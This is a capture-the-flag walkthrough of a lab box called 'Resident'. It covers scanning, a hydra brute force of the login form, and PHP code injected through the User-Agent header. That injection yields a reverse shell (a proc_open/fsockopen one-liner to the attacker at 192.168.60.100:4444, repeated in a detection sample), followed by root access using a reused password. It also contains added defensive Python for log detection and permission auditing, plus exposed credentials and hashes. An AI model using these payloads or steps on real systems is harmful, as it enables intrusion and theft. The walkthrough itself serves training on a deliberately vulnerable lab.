TheHackersLabs-Resident-Walkthrough
城南花已开 Lv6

Information Gathering

Service Discovery

BASH
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.164 08:00:27:5e:70:f7 (Unknown)
192.168.60.254 00:50:56:f9:b3:de (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.965 seconds (130.28 hosts/sec). 4 responded
export ip=192.168.60.164
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: allowing you to send UDP packets into the void 1200x faster than NMAP

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.164:22
Open 192.168.60.164:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-24 15:08 CST
Initiating ARP Ping Scan at 15:08
Scanning 192.168.60.164 [1 port]
Completed ARP Ping Scan at 15:08, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:08
Completed Parallel DNS resolution of 1 host. at 15:08, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:08
Scanning 192.168.60.164 [2 ports]
Discovered open port 80/tcp on 192.168.60.164
Discovered open port 22/tcp on 192.168.60.164
Completed SYN Stealth Scan at 15:08, 0.07s elapsed (2 total ports)
Nmap scan report for 192.168.60.164
Host is up, received arp-response (0.00033s latency).
Scanned at 2025-01-24 15:08:22 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:5E:70:F7 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.36 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Visiting port 80 in the browser shows a login form.

[image]

I tried logging in with weak credentials; no luck.

Let's scan for files and directories.

BASH
❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.164
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/connect.php (Status: 200) [Size: 1]
/dashboard.php (Status: 302) [Size: 0] [--> index.php]
/index.php (Status: 200) [Size: 2284]
/index.php (Status: 200) [Size: 2284]
/info.php (Status: 200) [Size: 79476]
/info.php (Status: 200) [Size: 79477]
/javascript (Status: 301) [Size: 321] [--> http://192.168.60.164/javascript/]
/logout.php (Status: 302) [Size: 0] [--> index.php]
/robots.txt (Status: 200) [Size: 144]
/robots.txt (Status: 200) [Size: 144]
Progress: 23670 / 23675 (99.98%)
===============================================================
Finished
===============================================================

A 31-character MD5 value.

A hint is found in robots.txt.

BASH
❯ curl http://$ip/robots.txt
Users admin

Pass JTM1JTYxJTMwJTM2JTMxJTM1JTMzJTYyJTMxJTMyJTYyJTMyJTY1JTYzJTM2JTMyJTMxJTMwJTYxJTM4JTYyJTYyJTM2JTM2JTY2JTM0JTY1JTM3JTM4JTYzJTM0

The password looks encoded in some way; I dropped it into CyberChef's auto-decode and got the string 5a06153b12b2ec6210a8bb66f4e78c4.

[image]

But I still couldn't log in. After reading other people's write-ups I learned that the MD5 is one character short at the end.

A normal MD5 hash is 32 characters long.
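What CyberChef did automatically, shown step by step as an added example (this is not code from the write-up): the robots.txt value is base64 wrapped around percent-encoded ASCII, and the text underneath is 31 hex characters, which cannot be a complete MD5 digest because a 16-byte digest always renders as exactly 32 hex characters. md5_shape() makes that length-and-alphabet check explicit; the function names are my own.

```python
import base64
import re
from typing import Dict
from urllib.parse import unquote

# The "Pass" value exactly as served by robots.txt on the box (copied from the page).
ROBOTS_PASS = ("JTM1JTYxJTMwJTM2JTMxJTM1JTMzJTYyJTMxJTMyJTYyJTMyJTY1JTYzJTM2JTMy"
               "JTMxJTMwJTYxJTM4JTYyJTYyJTM2JTM2JTY2JTM0JTY1JTM3JTM4JTYzJTM0")

HEX31 = re.compile(r"^[0-9a-f]{31}$")
MD5_HEX = re.compile(r"^[0-9a-f]{32}$")


def decode_hint(value: str) -> Dict[str, str]:
    """Peel off the two layers CyberChef's auto-decode removed: base64 on the
    outside, percent-encoding underneath. Both stages are returned so the
    '%35%61...' form that hides the hex digits is visible."""
    percent_form = base64.b64decode(value, validate=True).decode("ascii")
    plain = unquote(percent_form)
    return {"base64_decoded": percent_form, "url_decoded": plain}


def md5_shape(candidate: str) -> str:
    """Classify a string by whether it could be a hex MD5 digest. An MD5
    digest is 16 bytes, so its hex form is exactly 32 characters from 0-9a-f;
    31 hex characters means one nibble is missing, and any character outside
    0-9a-f cannot be part of a digest at all."""
    if MD5_HEX.match(candidate):
        return "well-formed md5"
    if HEX31.match(candidate):
        return "hex but one character short"
    return "not a hex md5"


if __name__ == "__main__":
    stages = decode_hint(ROBOTS_PASS)
    for name, text in stages.items():
        print(f"{name}: {text}")
    print(md5_shape(stages["url_decoded"]))
```

Running it prints the percent-encoded intermediate form, the 31-character string from the page, and the verdict "hex but one character short". The same check also tells you that only the sixteen hex digits can complete a digest, so of the 36 suffixes tried later on the page, everything from "g" to "z" could never form a valid MD5 hex string.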

Let's generate a wordlist.

BASH
for i in {a..z} {0..9};do echo 5a06153b12b2ec6210a8bb66f4e78c4$i>>pass.txt;done
cat pass.txt
5a06153b12b2ec6210a8bb66f4e78c4a
5a06153b12b2ec6210a8bb66f4e78c4b
5a06153b12b2ec6210a8bb66f4e78c4c
5a06153b12b2ec6210a8bb66f4e78c4d
5a06153b12b2ec6210a8bb66f4e78c4e
5a06153b12b2ec6210a8bb66f4e78c4f
5a06153b12b2ec6210a8bb66f4e78c4g
5a06153b12b2ec6210a8bb66f4e78c4h
5a06153b12b2ec6210a8bb66f4e78c4i
5a06153b12b2ec6210a8bb66f4e78c4j
5a06153b12b2ec6210a8bb66f4e78c4k
5a06153b12b2ec6210a8bb66f4e78c4l
5a06153b12b2ec6210a8bb66f4e78c4m
5a06153b12b2ec6210a8bb66f4e78c4n
5a06153b12b2ec6210a8bb66f4e78c4o
5a06153b12b2ec6210a8bb66f4e78c4p
5a06153b12b2ec6210a8bb66f4e78c4q
5a06153b12b2ec6210a8bb66f4e78c4r
5a06153b12b2ec6210a8bb66f4e78c4s
5a06153b12b2ec6210a8bb66f4e78c4t
5a06153b12b2ec6210a8bb66f4e78c4u
5a06153b12b2ec6210a8bb66f4e78c4v
5a06153b12b2ec6210a8bb66f4e78c4w
5a06153b12b2ec6210a8bb66f4e78c4x
5a06153b12b2ec6210a8bb66f4e78c4y
5a06153b12b2ec6210a8bb66f4e78c4z
5a06153b12b2ec6210a8bb66f4e78c40
5a06153b12b2ec6210a8bb66f4e78c41
5a06153b12b2ec6210a8bb66f4e78c42
5a06153b12b2ec6210a8bb66f4e78c43
5a06153b12b2ec6210a8bb66f4e78c44
5a06153b12b2ec6210a8bb66f4e78c45
5a06153b12b2ec6210a8bb66f4e78c46
5a06153b12b2ec6210a8bb66f4e78c47
5a06153b12b2ec6210a8bb66f4e78c48
5a06153b12b2ec6210a8bb66f4e78c49

Use hydra to brute-force the login form.

BASH
❯ hydra -l admin -P pass.txt $ip http-post-form "/index.php:username=^USER^&password=^PASS^:F=incorrectos"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-24 15:41:50
[DATA] max 16 tasks per 1 server, overall 16 tasks, 36 login tries (l:1/p:36), ~3 tries per task
[DATA] attacking http-post-form://192.168.60.164:80/index.php:username=^USER^&password=^PASS^:F=incorrectos
[80][http-post-form] host: 192.168.60.164 login: admin password: 5a06153b12b2ec6210a8bb66f4e78c4a
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-01-24 15:41:51

We get the password 5a06153b12b2ec6210a8bb66f4e78c4a.

After logging in there is a feature that prints messages; I tried command injection, which didn't work.

[image]

But XSS injection does work.

[image]

[image]

SSRF

There is also the request feature shown below, which may be vulnerable to SSRF.

[image]

Once you have the username you can brute-force SSH directly; ram's password turns out to be fuckyou.

You can also inject PHP code into the User-Agent header; it gets executed and gives a reverse shell.

[image]

I tried an nc reverse shell, which didn't work.

After several tries I found that a shell spawned through PHP's proc_open calls back and doesn't get cut off.

<?php $sock=fsockopen("192.168.60.100",4444);$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>
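Seen from the defender's side, the User-Agent header is the artefact that survives: whatever server-side code evaluated it (the write-up does not show it), the payload is sitting in the web server's access log. The following Python is an added example, not code from the write-up: it parses Apache "combined" format lines and flags any request whose User-Agent carries a PHP open tag or one of the process/socket functions a reverse shell needs. The log lines are constructed; the third one is modelled on the proc_open snippet above and uses the lab addresses from the page.

```python
import re
from typing import Dict, List, Optional

# Constructed Apache "combined" access-log lines (not real logs from the box).
# The third line carries a PHP payload in the User-Agent field, modelled on the
# proc_open snippet in the write-up.
SAMPLE_LOG = """\
192.168.60.100 - - [24/Jan/2025:16:10:01 +0800] "GET /index.php HTTP/1.1" 200 2284 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
192.168.60.100 - - [24/Jan/2025:16:10:05 +0800] "POST /index.php HTTP/1.1" 302 0 "http://192.168.60.164/index.php" "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
192.168.60.100 - - [24/Jan/2025:16:16:10 +0800] "GET /dashboard.php HTTP/1.1" 200 1337 "-" "<?php $s=fsockopen('192.168.60.100',4444);proc_open('sh',array(0=>$s,1=>$s,2=>$s),$p); ?>"
192.168.60.100 - - [24/Jan/2025:16:16:12 +0800] "GET /logout.php HTTP/1.1" 302 0 "-" "curl/8.5.0"
"""

# %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-agent}i"
# The User-Agent is the final quoted field, so a greedy .* up to the last quote
# keeps any embedded quotes or parentheses intact.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>.*)"$'
)

# Content that has no business in a User-Agent: PHP open tags and the
# process/socket functions a reverse shell needs.
PHP_MARKERS = re.compile(
    r"<\?php|<\?=|\b(proc_open|fsockopen|popen|system|passthru|shell_exec|exec)\s*\(",
    re.I,
)


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into named fields; None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def flag_php_user_agents(log_text: str) -> List[Dict[str, str]]:
    """Return one record per request whose User-Agent matches PHP_MARKERS."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_combined(line)
        if rec is None:
            continue
        m = PHP_MARKERS.search(rec["ua"])
        if m:
            hits.append({"ip": rec["ip"], "ts": rec["ts"], "req": rec["req"],
                         "marker": m.group(0), "ua": rec["ua"]})
    return hits


if __name__ == "__main__":
    for hit in flag_php_user_agents(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['req']} -> matched {hit['marker']!r}")
```

On the sample data only the /dashboard.php request is flagged, matched on the "<?php" open tag. Ordinary browser and curl User-Agents contain parentheses and slashes but never a PHP function name followed by "(", which is why the marker pattern anchors on the function call rather than on punctuation.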

User Privilege Escalation

BASH
❯ pwncat-cs -lp 4444
[16:15:49] Welcome to pwncat 🐈! __main__.py:164
[16:16:11] received connection from 192.168.60.164:43270 bind.py:84
[16:16:12] 0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:957
[16:16:13] 192.168.60.164:43270: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@TheHackersLabs-Resident:/var/www/html$

There are two users, ram and simple, and many of ram's files are readable.

Got the user flag, plus some other information.

There is a password hash for ram.

(remote) www-data@TheHackersLabs-Resident:/var/www$ cat /etc/passwd|grep /bin/bash
root:x:0:0:root:/root:/bin/bash
simple:x:1000:1000:simple,,,:/home/simple:/bin/bash
ram:x:1001:1001::/home/ram:/bin/bash
(remote) www-data@TheHackersLabs-Resident:/home/ram$ ls -al
total 44
drwxr-xr-x 3 ram ram 4096 Oct 8 10:58 .
drwxr-xr-x 4 root root 4096 Oct 7 12:45 ..
-rw------- 1 ram ram 0 Oct 8 10:58 .bash_history
-rw-r--r-- 1 ram ram 220 Mar 29 2024 .bash_logout
-rw-r--r-- 1 ram ram 3526 Mar 29 2024 .bashrc
-rw-r--r-- 1 ram ram 5290 Jul 12 2023 .face
lrwxrwxrwx 1 ram ram 5 Jul 12 2023 .face.icon -> .face
drwxr-xr-x 3 ram ram 4096 Oct 7 12:46 .local
-rw-r--r-- 1 ram ram 807 Mar 29 2024 .profile
-rw-r--r-- 1 ram ram 97 Oct 7 13:31 password.txt
-rw-r--r-- 1 root root 11 Oct 8 10:57 root.txt
-rw-r--r-- 1 ram ram 41 Oct 7 13:39 user.txt
(remote) www-data@TheHackersLabs-Resident:/home/ram$ cat *.txt
ram:$y$j9T$v3fiA7W1LOJmdyVZGUfIp0$TF7qqhsJ1SnWH8caDijOlxCjIo2VXgurTgq6DIlxmE1:20003:0:99999:7:::
macbookpro
70ff9f33926b1865edde645073a37bd1fffba984
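The listing above is the whole reason the last step needs no exploit: password.txt and user.txt are mode 644 in ram's home, and root.txt is owned by root yet world-readable there. As an added example that is not part of the write-up, this Python audit walks a home directory and reports both conditions, with a chmod suggestion for the first. run_demo() recreates the file names and modes from the listing in a temporary directory (the constructed sample); ownership cannot be reproduced without root, so the owner-mismatch check only fires on a real system.

```python
import os
import re
import stat
import tempfile
from pathlib import Path
from typing import Dict, List

# File names worth a second look when anyone on the system can read them.
SENSITIVE_NAME = re.compile(
    r"pass(word|wd)?|secret|cred|token|user\.txt$|root\.txt$|^id_(rsa|ed25519|ecdsa|dsa)$",
    re.I,
)


def audit_home(home: Path) -> List[Dict[str, str]]:
    """Report (1) sensitively named regular files with the other-read bit set
    and (2) regular files whose owner is not the home directory's owner."""
    findings = []
    home_uid = home.stat().st_uid
    for path in home.rglob("*"):
        try:
            st = path.lstat()
        except OSError:
            continue                      # entry vanished or is unreadable
        if not stat.S_ISREG(st.st_mode):
            continue                      # skip directories, symlinks, sockets
        mode = oct(stat.S_IMODE(st.st_mode))
        if (st.st_mode & stat.S_IROTH) and SENSITIVE_NAME.search(path.name):
            findings.append({"name": path.name,
                             "issue": "world-readable sensitive file",
                             "mode": mode,
                             "fix": f"chmod 600 {path}"})
        if st.st_uid != home_uid:
            findings.append({"name": path.name,
                             "issue": f"owned by uid {st.st_uid}, not home owner {home_uid}",
                             "mode": mode,
                             "fix": f"review why {path} lives in this home"})
    return findings


def audit_all_homes(base: Path = Path("/home")) -> Dict[str, List[Dict[str, str]]]:
    """Run audit_home over every directory under base (normally /home)."""
    return {d.name: audit_home(d) for d in base.iterdir() if d.is_dir()}


def run_demo() -> List[Dict[str, str]]:
    """Constructed sample: rebuild ram's home with the names and modes from the
    listing on the page (plus one properly protected file) and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        home = Path(tmp) / "ram"
        home.mkdir()
        for name, mode in [("password.txt", 0o644), ("user.txt", 0o644),
                           (".bashrc", 0o644), (".bash_history", 0o600),
                           ("secret-notes.txt", 0o600)]:
            p = home / name
            p.write_text("constructed sample content\n")
            os.chmod(p, mode)
        return audit_home(home)


if __name__ == "__main__":
    for finding in run_demo():
        print(finding)
```

In the demo only password.txt and user.txt are reported: .bashrc is world-readable but not sensitively named, and secret-notes.txt has a sensitive name but is mode 600, so the two conditions have to coincide before a file is flagged. On a live host, audit_all_homes() gives the per-user view that would have surfaced both password.txt and the root-owned root.txt in ram's home.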

Since I can already read the user's files, why bother logging in as that user?

Root Privilege Escalation

I guessed macbookpro was root's password.

It logged straight in.

BASH
(remote) www-data@TheHackersLabs-Resident:/home/ram$ su root
Password:
root@TheHackersLabs-Resident:/home/ram# cd ~
root@TheHackersLabs-Resident:~# cat root.txt
53175bcc0524f37b47062fafdda28e3f8eb91d519ca0a184ca71bbebe72f969a

Wait, what is this?! This box is a bit trashy.